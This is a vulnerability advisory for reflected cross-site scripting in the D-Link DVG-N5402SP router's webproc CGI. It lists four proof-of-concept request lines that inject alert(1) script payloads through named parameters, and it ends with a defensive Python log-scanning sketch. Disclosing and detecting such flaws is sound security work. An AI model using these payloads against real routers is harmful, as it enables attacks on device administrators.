DLINK DVG-N5402SP Multiple Cross-Site Scripting

2016.02.23
Credit: vesp3r
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

DLink Multiple Cross Site Scripting Vulnerabilities

Vendor : www.dlink.com
Product Model: DVG-N5402SP
Published: 02/22/2016
Discovered by vesp3r (vesp3r7c3@gmail.com)

Advisory Timeline
-----------------
02/05/2016 - Vendor notified (No response)

Vulnerability
-------------
Reflected Cross Site Scripting

1) getpage parameter

GET /cgi-bin/webproc?getpage=html/index.html&var:menu=advanced1337"%3balert(1)%2f%2f158&var:page=firewall&var:subpage=URLFilter HTTP/1.1

2) var:menu parameter

GET /cgi-bin/webproc?getpage=html/index.html&errorpage=html/main.html&var:language=zh_cn&var:menu=setup1337"%3balert(1)%2f%2f122&var:page=connected&var:retag=1&var:subpage=- HTTP/1.1

3) var:page parameter

/cgi-bin/webproc?getpage=html/index.html&var:menu=advanced&var:page=firewall9542"%3balert(1)%2f%2f198&var:subpage=dmz

4) var:subpage parameter

/cgi-bin/webproc?getpage=html/index.html&errorpage=html/main.html&var:language=zh_cn&var:menu=setup&var:page=connected&var:retag=1&var:subpage="><script>alert(1)<%2fscript>z376l HTTP/1.1
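
For detection, requests to /cgi-bin/webproc can be checked in web or proxy logs by validating the four parameters named above against an allow-list. The Python sketch below is an added example, not part of the original advisory; the allow-list pattern, the function names and the sample request lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameters the advisory lists as reflected by /cgi-bin/webproc.
WATCHED = {"getpage", "var:menu", "var:page", "var:subpage"}

# Assumption: legitimate values are short page/menu names or relative
# paths such as "html/index.html", "firewall" or "-".
SAFE_VALUE = re.compile(r"[A-Za-z0-9_./-]{0,64}")


def suspicious_params(request_target):
    """Return the watched parameters whose decoded value is off the allow-list."""
    parts = urlsplit(request_target)
    if parts.path != "/cgi-bin/webproc":
        return []
    hits = set()
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name in WATCHED and not SAFE_VALUE.fullmatch(value):
            hits.add(name)
    return sorted(hits)


def scan(request_lines):
    """Return (line_number, flagged_parameters) for each suspicious request line."""
    findings = []
    for number, line in enumerate(request_lines, 1):
        # The request target is the first field that starts with "/".
        target = next((f for f in line.split() if f.startswith("/")), None)
        if target:
            flagged = suspicious_params(target)
            if flagged:
                findings.append((number, flagged))
    return findings


# Constructed sample request lines (not captured traffic).
SAMPLE = [
    "GET /cgi-bin/webproc?getpage=html/index.html&var:menu=advanced&var:page=firewall&var:subpage=dmz HTTP/1.1",
    "GET /cgi-bin/webproc?getpage=html/index.html&var:menu=setup%22%3Bprobe&var:page=connected&var:subpage=- HTTP/1.1",
    "GET /cgi-bin/webproc?getpage=html/index.html&var:menu=setup&var:page=connected&var:subpage=%22%3E%3Cb%3E HTTP/1.1",
    "GET /index.html?var:menu=%22 HTTP/1.1",
]

if __name__ == "__main__":
    for number, flagged in scan(SAMPLE):
        print(f"line {number}: unexpected characters in {', '.join(flagged)}")
```

The same allow-list can be enforced in a reverse proxy placed in front of the device's management interface, since the vendor had not responded at the time of publication.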

